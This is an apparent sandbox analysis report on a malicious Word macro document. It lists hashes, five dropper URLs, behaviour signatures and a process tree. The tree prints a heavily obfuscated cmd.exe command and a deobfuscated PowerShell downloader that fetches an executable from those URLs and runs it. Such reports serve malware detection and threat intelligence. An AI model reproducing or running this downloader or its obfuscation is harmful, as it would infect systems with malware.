Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    19-05-2024 18:19

General

  • Target

    5ac1e88265ded3e67477cce519906e50_JaffaCakes118.doc

  • Size

    126KB

  • MD5

    5ac1e88265ded3e67477cce519906e50

  • SHA1

    725f2a559f053ca645caa64f83e267f101474576

  • SHA256

    8e8423332fc3be61a54a2d4f2faaa5d0fac4de05af71a5fabbac0adac89d3456

  • SHA512

    72010c07a9ef5ea23e2d3e088c3c420c233ff5aa3d7c9b4bb6c7f453d8edda6c7a6787e461e57c441c2ad27170d12ca6343228d6c47597c24991bfbe56c6c99d

  • SSDEEP

    1536:8ptJlmrJpmxlRw99NBu+aFKUI4BxanVldfalV0UQwGZJCVwbGOrXWy:cte2dw99f1IkbLiNXy

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.knamanpower.com/U

exe.dropper

http://www.flanaganlaw.com/wkM

exe.dropper

http://lakecomoholidayapartments.com/uxbCg173

exe.dropper

http://farkop27.ru/uEEhY0

exe.dropper

http://juegosaleo.com/iu8xL5T1

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5ac1e88265ded3e67477cce519906e50_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1868
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3020
      • C:\Windows\SysWOW64\cmd.exe
        cmd /V/C"^s^e^t ^w^7=^8^7^_^ ^q*^j^ ^'4^7^ C^ ^z^ ^b^Z^S^ ^m^?^e^ n^{( Jv^|^ ^p^S^E^ ^<^+{^ (^'^W^ ^z^0^ ^ ^:^M^3^ ^J^L^U^ ^J^d^[^ ^T^.^Z^ ^,Z^m^ ^xN^\^}^{^o^6^}^Z^`V^{^t^1^u^h^A^8^7cP^;^9^t%R^F^aC^7^mcs^=^4^}/^d^*^;^.^wU^k^a^'^{^a^@'^`^eP^8^Kr^;X^D^b/^$^Z^;^i^kc^DC^B^]V^6^T^-z^8^j^h^$N^d)^ ^Y^:^Om^.^f^:^e^:^JC^t*^]^d^I^Q^d^p^-^x^B/^ep^&^F^k^*^8^\^o^:^w^Zv^mv^-n^s(^*^Imr^;^;1^T^')^mN^ ^D^L^MCV^`^]^#^z_^B^f^$]^x^z^ (^2^~^,^'^g^u^t^eC^:^Zz^AkN^T^k^W^$a^_^;(^$^p=^e^|/^&^l^|m^G^i^[^|^z^F^9^S^_^d^G^;^,^a^m^J^'^o^|e^5^l^]^5^_n^t^X^`^w^yR%^o^=^DR^D^;^D^j^.^E^h^9^I^]^<^'d^b^[^zw^W^i^~^$H^q^b^{^<^T^]^y^>^U^Er^:^q^e^tV)^s^{^E^|^i)^0^mA^z^k^;^&^zy^&^8^M^_^ER^$^Z^HR^ ^Z^dRn(w^I^i(^>^e^ ^;^1)^t^3^B^o^Z^bc(N^x^G^k^$^&^Q%(^M^b/^h/^;(c^x^[^1a^U^-[^e^7^a^Yr^B^uz^o^[^Y^9f^:^@^[^;^L^Z^|^'n^.^$^e^6;Kx^AR^u^e^t^A^G^.^-^@^1^'^5^Y^a^+c^m^[Z^Zr^Y^tV^#^:^b^m^2^w^$^7^I(^+C^W^;^'^f^ ^g^\^;^13^'(^H^h^+^\^:^Ac^@^{^o^iB^`5^l^fq^:^bV^0^T^uc^y^Up^H_^x^:^Z^p^$v^b^2^&n^p^I^?e^L^`^t^$^-^w^]^=^jD^Q^D^{^f^GV%^9^E^z^@^J)^$^AN^T^;%^x`^'/^&^~0^7n^?^1W^Q^]1^Y^g^G^'^t^=^J^ ^E^$^-^=^d^X^U^ ^U^<^m^Z^K^Gxt^Y^T^`b^y^L^_^$^3^O^G^;^y^IC)^p^6^F^'^,T^A^@x^EN^'^p^[^G(^xg^s^t^`^o^>^i^u(^M^lu^wy^p^o^G^;^S^;^sG^.^,5^E^'vu^l^1^-v^3^T^eC^+5^Q^yn^L^2^mAx^w^~^<^8^XN^}^u^[^<r^i^W^_v/^B^]^h^m^-(^'^o^Z^d%c^En^5^.^4CR^o^y^H^l^e^U^e^a^l^b~^x^a^>^a^Q^sv^P^<^o^JV^<^g^k^&^eer^8^k^u^W^g^h^j^bT^@/^<^{^:/^K^S(^:^.v^'^pN^F^p^tl^E^yt^ ^J^s^h^Ic^'^@^lI^-^0(^Q^3^Y@lm^h^$^4^L^E^9^p^7^Ey%^S^u^*Em/^y^T^i^u(^+/r^d^g^h^.^\^_^'^7^3^G^4^2^7^J^m^p^$^p^d^o^X^Y^z^k^M^.^lr^'^B^a^a^_R^X^f^?^|^m/)^D^;/^]^m^0^:^S^i^q^p^q)^0^t^0^u^|^t^O^4^H^h^.Br^@^2^u^F^3^6^9^=^7^{^ ^J^1^Z^:^I^g^|^@^IC^O^S^6^b^k^G-^x^l^W^u^u^W^1^ /^0^Q^9^m^G^#^J^o^i^&/c^H^*^f^.^d^}^Hs^>F^G^t^_^enn^X(^e^e^}^J^?^m(^O^u^t^A/nr^~h^j^a^w^,^*p{V^B^a^2^A^E^y^B^z^X^a^FC^4^d^>^K^=^iS^+^#^lcC^?^o%^l^G^h^:^Z%^o^p^`v^m^@^-^e^o^o^,acL^}^s^e^q0v^k^-^>^<^a^Q)^T^l)^:N/^3^a^O/V/g^:^g^i^\^p^U^I^O^t^\^:V^t^@z^'^h^Dn^7^@^H^Y(^M^y^I^Y^k^{v^U^w^p^b^i/^K^l^km^_s^L^o^U^d^@c^i^M^s.^-^K^J^w^o^F^W^a^W^:^8^l^g^O^0n^w^l^s^a^8^k^ ^g^ZC^u^a^}/^bnc^s^A^a(^W^A^l^J^g^z^f^&^>^;^.^~^,^G^w^h^8^L^w7^p^I^w^e^Y^b/,^Y^m/^y^Q^7^:)^&^>^p^U(^a^t^L^|^$^t^]^t^l^h^P^:^;^@^u^B^'^U^z^W^o/^2^L^w^m^,^q^\o^+P*c^&N^I^.^Y^#rr^0^|)^e^\^4^l^w$^~^e^or^_^|^p^d^,^ln=^E^Ka%E^Bm^z^q^*^a^<^;^>nJv^,^k^\R^d^.^a^d^q^w^Tc^W^w^=^a^?^w^`^0^./^|^t^j/^l^t^-^:^?~^W^p^8^\V^t^*^;{^tn^t^,^hrj^J^'^]^D^U^=^Q^8^.^z^:O^Q^z^s^B^S^M^ev`^$^hSC^;^65+^t^yn^dn^7T^6^e^si^G^i^U^Q)^l^T^,^7C^9^J^7^b^~N^t^eZ^\^}^WR^Dv.^0^G(^t^uv^8^e^`^D^&N^*^]6^ ^Hl^'^t^X^e^8c^iC^g^e^@^B^K^j^ ^}R^bc^-^d^o\^$^&^-^'^>^2^w^h^g^I^eV^-^tn^A^>^e^=r^H^U^I^sn^7^d^[^l^~w^A^MF^$^$8^: ^B^9^}^l^`^q^1^l^;^&)^e^4^}^E^h^,^*^ ^sN^sVr^Z^]^~^e^WT^k^w^6R^0^o^Z^Fz^p&&^f^or /^L %C ^in (^1^4^9^1^,^-^4^,^3)^d^o ^s^e^t ^D^b^4=!^D^b^4!!^w^7:~%C,1!&&^i^f %C ^l^e^q ^3 c^a^l^l %^D^b^4:^*^D^b^4^!^=%"##
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:1896
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $wdI=new-object Net.WebClient;$Mzz='http://www.knamanpower.com/U@http://www.flanaganlaw.com/wkM@http://lakecomoholidayapartments.com/uxbCg173@http://farkop27.ru/uEEhY0@http://juegosaleo.com/iu8xL5T1'.Split('@');$btZ = '110';$zVD=$env:public+'\'+$btZ+'.exe';foreach($NZt in $Mzz){try{$wdI.DownloadFile($NZt, $zVD);Invoke-Item $zVD;break;}catch{}} ##
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2040

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      4a1f0780af0683cca074813bbbb5a603

      SHA1

      31746c6651d897148ac881437232a2fe55ea1f0f

      SHA256

      53e9e5740a301a58dfa1b1e5a1a7c0608c0ad7b02725f6f77ff5305065cb41b6

      SHA512

      ab8fc7e6f1ca34782222cc2adacf0d2e01db07c11388cda19c4891bb5bca70da470385513bcc35ff0c59cdb93b126601a8005e16da7bb0c9ba499bf2274b3354

    • memory/1868-18-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-19-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-17-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-10-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-59-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-69-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-110-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-68-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-58-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-49-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-43-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-15-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-20-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-0-0x000000002F6D1000-0x000000002F6D2000-memory.dmp

      Filesize

      4KB

    • memory/1868-6-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-2-0x000000007165D000-0x0000000071668000-memory.dmp

      Filesize

      44KB

    • memory/1868-27-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-16-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-14-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-13-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-12-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-11-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-9-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-8-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-7-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-122-0x000000007165D000-0x0000000071668000-memory.dmp

      Filesize

      44KB

    • memory/1868-123-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1868-139-0x000000007165D000-0x0000000071668000-memory.dmp

      Filesize

      44KB